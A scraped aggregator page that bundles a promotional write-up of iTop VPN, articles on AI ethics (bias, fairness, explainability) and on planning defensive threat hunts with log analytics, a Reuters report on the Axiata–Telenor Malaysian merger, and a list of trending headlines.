Connect with us

Big Data

Why choose iTop VPN for Windows

Published

on

A free VPN for Windows allows you to unblock prohibited apps or websites when using a public Wi-Fi connection, as well as protect your privacy. With the help of a military-grade private tunnel, iTop VPN also encrypts the network and hides your IP address. iTop VPN is the fastest, most secure, and largest bandwidth network available, allowing you to access the internet without limitations.

Features of iTop VPN Windows
This is the best VPN provider since it encrypts all internet traffic that enters and leaves your device.
It easily prevents third-party access to your data from being captured, collected, or spied on.
It also prevents digital activities like browsing history and internet history from being tracked.
It has covered the entire globe and supplied free VPN services to the majority of countries.
With a free VPN for Windows, you can disguise your physical location from websites that use location services.
An iTop VPN is also used to access geo-restricted websites. This even prevents you from tracking IP addresses, resulting in your window displaying an IP address from a different country.
This helps to divert attention away from geo-restricted websites, allowing you to readily visit them by displaying a different URL.
iTop VPN is a free VPN secure private network that features military-grade encryption that allows you to effortlessly and safely surf public, business, and school networks.

iTop VPN for Windows is Simple to Use
iTop VPN is a free VPN for Windows, and with a few methods, you can easily use it for your Windows. This application has a very user-friendly layout and provides you with the desired speed. iTop VPN prevents traffic from interfering with your data services and keeps your data safe and secure. It’s a free VPN for Windows that unblocks geo-restricted content and allows you to browse indefinitely.
iTop VPN allows the consumer to take advantage of the company’s regular service for no cost. Free VPN for Windows is the most powerful VPN proxy that allows you to escape all filters, censorships, and surveillance by masking your IP address. This is simple to accomplish with a single one-click connection. It also unblocks web content that is geo-restricted. This can help you protect your public or home network from unauthorized access and conduct risk-free digital transactions.

Final Thoughts
This is a completely safe and fast-speed network that anonymously covers the internet. Using this free VPN, you can effortlessly secure your Wi-Fi connection as well as your IP address. People are eager to download the free VPN system, and its popularity is growing by the day. It is an ever-evolving system that provides users with bug-free internet access and a user-friendly interface. It comes from a company that updates the version with new features every time you update it. The majority of consumers are satisfied with the product, and the network has received praise from all over the world. According to user ratings, iTop VPN is the finest program for providing the most safe and private server. Sign up for safe browsing right now.

Continue Reading

AI

The Third Pillar of Trusted AI: Ethics

Published

on

Click to learn more about author Scott Reed.

Building an accurate, fast, and performant model founded upon strong Data Quality standards is no easy task. Taking the model into production with governance workflows and monitoring for sustainability is even more challenging. Finally, ensuring the model is explainable, transparent, and fair based on your organization’s ethics and values is the most difficult aspect of trusted AI.

We have identified three pillars of trust: performance, operations, and ethics. In our previous articles, we covered performance and operations. In this article, we will look at our third and final pillar of trust, ethics.

Ethics relates to the question: “How well does my model align with my organization’s ethics and values?” This pillar primarily focuses on understanding and explaining the mystique of model predictions, as well as identifying and neutralizing any hidden sources of bias. There are four primary components to ethics: 

  • Privacy
  • Bias and fairness
  • Explainability and transparency
  • Impact on the organization

In this article, we will focus on two in particular: bias and fairness and explainability and transparency. 

Bias and Fairness

Examples of algorithmic bias are everywhere today, oftentimes relating to the protected attributes of gender or race, and existing across almost every vertical, including health care, housing, and human resources. As AI becomes more prevalent and accepted in society, the number of incidents of AI bias will only increase without standardized responsible AI practices.

Let’s define bias and fairness before moving on. Bias refers to situations in which,  mathematically, the model performed differently (better or worse) for distinct groups in the data. Fairness, on the other hand, is a social construct and subjective based on stakeholders, legal regulations, or values. The intersection between the two lies in context and the interpretation of test results.

At the highest level, measuring bias can be split into two categories: fairness by representation and fairness by error. The former means measuring fairness based on the model’s predictions among all groups, while the latter means measuring fairness based on the model’s error rate among all groups. The idea is to know if the model is predicting favorable outcomes at a significantly higher rate for a particular group in fairness by representation, or if the model is wrong more often for a particular group in fairness by error. Within these two families, there are individual metrics that can be applied. Let’s look at a couple of examples to demonstrate this point.

In a hiring use case where we are predicting if an applicant will be hired or not, we would measure bias within a protected attribute such as gender. In this case, we may use a metric like proportional parity, which satisfies fairness by representation by requiring each group to receive the same percentage of favorable predictions (i.e., the model predicts “hired” 50% of the time for both males and females). 

Next, consider a medical diagnosis use case for a life-threatening disease. This time, we may use a metric like favorable predictive value parity, which satisfies fairness by equal error by requiring each group to have the same precision, or probability of the model being correct. 

Once bias is identified, there are several different ways to mitigate and force the model to be fair. Initially, you can analyze your underlying data, and determine if there are any steps in data curation or feature engineering that may assist. However, if a more algorithmic approach is required, there are a variety of techniques that have emerged to assist. At a high level, those techniques can be classified by the stage of the machine learning pipeline in which they are applied:

  • Pre-processing
  • In-processing
  • Post-processing

Pre-processing mitigation happens before any modeling takes place, directly on the training data. In-processing techniques relate to actions taken during the modeling process (i.e., training). Finally, post-processing techniques occur after modeling the process and operate on the model predictions to mitigate bias.

Explainability and Transparency

All Data Science practitioners have been in a meeting where they were caught off-guard trying to explain the inner workings of a model or the model’s predictions. From experience, I know that isn’t a pleasant feeling, but those stakeholders had a point. Trust in ethics also means being able to interpret, or explain, the model and its results as well as possible. 

Explainability should be a part of the conversation when selecting which model to put into production. Choosing a more explainable model is a great way to build rapport between the model and all stakeholders. Certain models are more easily explainable and transparent than others – for example, models that use coefficients (i.e., linear regression) or ones that are tree-based (i.e., random forest). These are very different from deep learning models, which are far less intuitive. The question becomes, should we sacrifice a bit of model performance for a model that we can explain?

At the model prediction level, we can leverage explanation techniques like XEMP or SHAP to understand why a particular prediction was assigned to the favorable or unfavorable outcome. Both methods are able to show which features contribute most, in a negative or positive way, to an individual prediction. 

Conclusion

In this series, we have covered the three pillars of trust in AI: performance, operations, and ethics. Each plays a significant role in the lifecycle of an AI project. While we’ve covered them in separate articles, in order to fully trust an AI system, there are no trade-offs between the pillars. Enacting trusted AI requires buy-in at all levels and a commitment to each of these pillars. It won’t be an easy journey, but it is a necessity if we want to ensure the maximum benefit and minimize the potential for harm through AI. 

Coinsmart. Beste Bitcoin-Börse in Europa
Source: https://www.dataversity.net/the-third-pillar-of-trusted-ai-ethics/

Continue Reading

Big Data

How to Plan a Threat Hunt: Using Log Analytics to Manage Data in Depth

Published

on

Click to learn more about author Thomas Hazel.

Security analysts have long been challenged to keep up with growing volumes of increasingly sophisticated cyberattacks, but their struggles have recently grown more acute.

Only 46% of security operations leaders are satisfied with their team’s ability to detect threats, and 82% of decision-makers report that their responses to threats are mostly or completely reactive – a shortcoming they’d like to overcome.

The reactive approach to threat detection that so many security programs continue to follow is nothing new. Throughout most of its evolution, the field of cybersecurity has adapted itself to each novel attack technique that cybercriminals have come up with. The first commercial antivirus programs operated by following in attackers’ footsteps, updating their databases of known malware signatures each time researchers discovered a new strain of malicious code. Enterprises followed suit, deploying additional perimeter-based technologies each time a new one came out – usually to counter the latest threat.

In today’s cloud-centric and data-intensive computing environments, however, reactive defense strategies simply don’t work. The legacy assumption that threats can be kept out of a trusted internal corporate network has been rendered obsolete by borderless network architectures and “anyone, anytime, anywhere, any device” connectivity needs.

The growing frequency and growing impact of advanced persistent threats (APTs) – coupled with the recognition that spending alone cannot sufficiently protect their organization – is driving a renewed interest in threat hunting. Cybersecurity leaders recognize that passive controls and existing security technologies are limited in terms of what kinds of malicious activity they can uncover, and how quickly and efficiently they can do so. In contrast, threat hunting is the proactive approach of uncovering the threats that linger within the environment. And like the threat adversaries that they are up against, threat hunting relies as much on human savvy as on technology.

The good news is that using existing SecOps personnel, and the technologies already in place, organizations can ramp up an effective threat hunting capability rapidly.

What Is Threat Hunting?

Threat hunting is a proactive approach to cyber defense that’s predicated upon an “assume breach” mindset. A threat hunter commences work with the operating assumption that a breach has already occurred; the hunt is a methodical search for evidence of the attackers’ presence.

Because it enables security teams to address gaps in their existing operational processes and tooling, security organizations that implement hunting programs can dramatically improve their overall security posture.

Let’s walk you through how modern threat hunting tactics can help your enterprise reduce risk and increase efficiencies, all while revolutionizing your data cloud strategy for optimal security.

Build Threat Hunting Capabilities

Unlike most other SecOps roles, the threat hunter will purposefully seek out evidence of malicious activities that did not generate security alerts, using a methodical approach and multi-dimensional data analytics tools. The primary objective of threat hunting is to intercept potential attacks before damage is done, or to mitigate the damage of an attack in progress.

Effective threat hunting relies on a mindset and a methodical approach that allows the security analyst to think like a threat actor and use that understanding to determine what clues to look for to identify an attack underway. While experience certainly helps, the ever-changing landscape of threat actors, and their sophistication, requires the threat hunter to take a disciplined approach that structures a methodical hunt based on updated tools, techniques, and procedures (TTPs) of top global threat actors. Today’s threat hunter relies on a repeatable framework that allows the hunter to think through the stages of an attack, and then determine the clues or evidence to search for.

In addition, a foundation in core SecOps concepts and technologies allows for efficiency in hunting threats, including: malware analysispenetration testingincident response and forensics. Formal training programs are also available, offered through industry organizations like IASCA and the SANS Institute. To further build threat hunting capabilities, you should take the following steps.

1. Think Like Your Adversary

Like a good CIA agent, top threat hunters begin by adopting the mindset of their adversary. Thinking like an adversary allows the hunter to think through how to stage a successful attack. This begins by understanding the common stages that a sophisticated attack might take.

Though adversaries are always seeking to enhance their capabilities by exploiting previously undiscovered vulnerabilities or honing new techniques, the majority of attacks follow the same general trajectory – from initial compromise that gives them a beachhead in the environment, all the way through to data exfiltration (or another means of achieving the objective, like using ransomware rather than exfiltration to monetize their efforts).

Cybersecurity experts and threat researchers have identified six common steps of a typical sophisticated attack, or advanced persistent threat (APT).

Understanding these steps allows the threat hunter to define the potential clues of malicious behavior that align with one or more of the stages. This becomes a process of thinking through the tools an attacker might use at each stage, and the trail of evidence – however faint – that would be left behind. In many cases, attackers will seek to exploit existing, sanctioned tools that are already in the environment in their attempt to avoid detection. Thus, when planning, threat hunters think through how to find unusual usage of these commonly used tools, in order to home in on potential cases in which they are being hijacked for malicious purposes.

2. Analyze Your Data in Depth

Threat hunting involves investigating a hypothesized attack scenario, rather than following up on an alert that existing security tools have generated.

Lacking the clear-cut evidence that would trigger an alarm, threat hunting requires the hunter to gather intelligence, by conducting various analyses on the data in the environment. Indeed, the most successful hunt teams rely on large-scale data aggregation and analysis that go beyond many other use cases of log data (e.g., IT monitoring).

One of the most important determinants of a security organization’s hunting ability is the quantity and quality of the log data it collects and makes available to the SecOps team. A majority of security professionals believe that enriching the systems in their security operations center (SOC) with additional data sources is the most important step they could take in order to enhance their threat hunting capabilities.

Broadly speaking, threat hunters need access to both host and network data sources as well as cloud application logs. Host logs can be collected via an agent or through native logging applications like Windows Event Forwarding, the Sysmon utility, auditing services for Linux architectures, or unified logging for MacOS. These logs should provide visibility into how configuration management utilities like PowerShell are being used within the environment, since these tools are commonly exploited by attackers seeking to maintain persistence while keeping a low profile.

Which specific data sources are needed for a particular hunt depends on the hypothesis that’s under investigation. Standard knowledge bases and frameworks such as MITRE ATT&CK associate a list of data sources that can be examined for evidence of each TTP they include.

Because of the ever-changing landscape of both the IT organization and the global cyberthreat landscape, data platforms hunters rely on must have the ability to ingest and index a wide variety of data types from a wide variety of sources at speed. They also need to be flexible enough to incorporate additional sources without needing to re-extract, transform, and load (ETL) the original data set.

Data Sources with Hunt Types: Examples of Attack Scenarios

Many different threat groups and adversaries make use of malicious PowerShell commands.

Attackers with elevated privileges can remain undetected for long periods of time while performing exploratory, command, and control (C2) and malicious file execution activities using this powerful Windows scripting environment, which can execute commands locally and on remote computers. Attackers often leverage PowerShell to maintain persistence in an environment without needing to install malware. Data sources required to hunt for PowerShell-based attacks include DLL monitoring, file monitoring, PowerShell logs, process command-line parameters, process monitoring, and Windows event logs.

In another illustrative example, hunters might search for signs that attackers are leveraging Microsoft’s Component Object Model (COM) – a set of standards that enable Microsoft Office products to seamlessly interact – to execute malicious code, manipulate software classes in the current user registry, and through these activities, maintain persistence without being noticed.

If you’re looking for evidence that this technique has been employed, you should include DLL monitoring, loaded DLLs, process command-line parameters, process monitoring, and Windows registry monitoring among your data sources.

The third case in point: To locate valuable data or other resources of interest, attackers typically undertake a discovery and exploration process, moving across the network to figure out the lay of the land.

While doing so, attackers often attempt to employ tools that allow them to authenticate to remote systems or execute commands on remote hosts. Windows Management Instrumentation (WMI) is frequently used for this purpose by attackers trying to gain remote access to Windows system components. Data sources that can reveal this attack technique to your hunt team include authentication logs, Netflow data, process command-line parameters, and process monitoring.

Access the Data: Central Log Management, SIEM Platform, or Both?

It’s common for security teams to rely on existing SIEM platforms for threat hunting. However, most SIEM solutions were designed and implemented for compliance and reporting purposes and thus may have limitations when it comes to threat hunting.

SIEM Drawbacks

  1. Labor-intensive and complex to manage
  2. Limited in the number of log data types or amount of contextual information they’re able to ingest
  3. Bound by licensing models that make it cost-prohibitive to store data for longer retention periods
  4. Subject to performance issues (slow search) as data volumes increase

To level up threat hunting capabilities, security leaders often choose to supplement SIEM with a centralized log management solution. These tools aren’t competitive but complementary.

This strategy has each work in parallel, with the data lake platform accepting logs that are forwarded from the SIEM. It’s also possible to split the data between the two using an automated data pipeline.

Plan Your Threat Hunt 

Once you’ve found the people and instituted the processes, next comes the technology that allows flexible, integrated access to your data.

Initially developed to serve as the user interface for the Elasticsearch search engine, Kibana has grown into one of the most widely used data analytic tools in threat hunting today.

Kibana is both powerful and flexible, allowing threat hunters to conduct a wide range of queries, perform data correlations, and create data visualizations that help uncover the hidden insights within the data sets. Its capabilities include drill-down dashboard building, time series analysis, and the ability to create a wide array of visualizations including bar and pie charts, tables, histograms, and maps. These visualization capabilities allow threat hunters to search through large volumes of aggregated data to quickly identify outliers in a manner that’s efficient and consistent.

Some organizations go further, coupling Kibana with data platforms that enable search and analysis of security log data at scale. This means even resource-constrained security teams can create a security data lake in the cloud to facilitate and accelerate threat hunting.

It is vital organizations retain large volumes of historical log data from a broad array of sources, so proactive threat hunting can take place at a rapid pace – uncovering the clues that even the most sophisticated of attackers inevitably leave behind.

Ready to start the hunt? 

Coinsmart. Beste Bitcoin-Börse in Europa
Source: https://www.dataversity.net/how-to-plan-a-threat-hunt-using-log-analytics-to-manage-data-in-depth/

Continue Reading

Big Data

Axiata, Telenor sign deal to merge Malaysian telecoms units

Published

on

OSLO (Reuters) -Malaysian telecoms firm Axiata Group Bhd and Norway’s Telenor ASA have agreed to merge their mobile operations in Malaysia, forming a new market leader in the southeast Asian nation, the two firms said on Monday.

The planned transaction, which remains subject to regulatory and other approvals, is expected to be completed by the second quarter of 2022, the firms said.

Telenor and Axiata will each own 33.1% of the merged firm, which will remain listed in Kuala Lumpur. As part of the deal, Axiata will also receive $470 million in cash, in line with a preliminary agreement announced in April.

As a result of the deal, the companies plan cost cuts and savings on capital expenditure with a net present value amounting to some $2 billion, Telenor said in a statement.

(Reporting by Terje Solsvik; Editing by Christopher Cushing)

Image Credit: Reuters

Coinsmart. Beste Bitcoin-Börse in Europa
Source: https://datafloq.com/read/axiata-telenor-sign-deal-merge-malaysian-telecoms-units/15620

Continue Reading

Big Data

Exploring Mito: Automatic Python Code for SpreadSheet Operations

Published

on



Exploring Mito: Automatic Python Code for SpreadSheet Operations – Analytics Vidhya





















Learn everything about Analytics


Coinsmart. Beste Bitcoin-Börse in Europa
Source: https://www.analyticsvidhya.com/blog/2021/06/exploring-mito-automatic-python-code-for-spreadsheet-operations/

Continue Reading
Esports5 days ago

World of Warcraft 9.1 Release Date: When is it?

Esports2 days ago

Select Smart Genshin Impact: How to Make the Personality Quiz Work

Energy5 days ago

Biocides Market worth $13.6 billion by 2026 – Exclusive Report by MarketsandMarkets™

Esports5 days ago

Here are the patch notes for Brawl Stars’ Jurassic Splash update

Blockchain2 days ago

Bitmain Released New Mining Machines For DOGE And LTC

Blockchain4 days ago

PancakeSwap (CAKE) Price Prediction 2021-2025: Will CAKE Hit $60 by 2021?

Esports4 days ago

Here are the patch notes for Call of Duty: Warzone’s season 4 update

Esports4 days ago

How to complete Path to Glory Update SBC in FIFA 21 Ultimate Team

Energy5 days ago

XCMG dostarcza ponad 100 sztuk żurawi dostosowanych do regionu geograficznego dla międzynarodowych klientów

Blockchain4 days ago

Will Jeff Bezos & Kim Kardashian Take “SAFEMOON to the Moon”?

Gaming5 days ago

MUCK: Best Seeds To Get Great Loot Instantly | Seeds List

Esports4 days ago

How to Get the Valorant ‘Give Back’ Skin Bundle

Esports4 days ago

How to unlock the MG 82 and C58 in Call of Duty: Black Ops Cold War season 4

Blockchain3 days ago

Digital Renminbi and Cash Exchange Service ATMs Launch in Beijing

Aviation2 days ago

Southwest celebrates 50 Years with a new “Freedom One” logo jet on N500WR

Esports4 days ago

How to unlock the Call of Duty: Black Ops Cold War season 4 battle pass

Blockchain3 days ago

Bitcoin isn’t as Anonymous as People Think it is: Cornell Economist

Aviation2 days ago

Delta Air Lines Drops Cape Town With Nonstop Johannesburg A350 Flights

AR/VR4 days ago

Larcenauts Review-In-Progress: A Rich VR Shooter With Room To Improve

Blockchain3 days ago

Index Publisher MSCI Considers Launching Crypto Indexes

Trending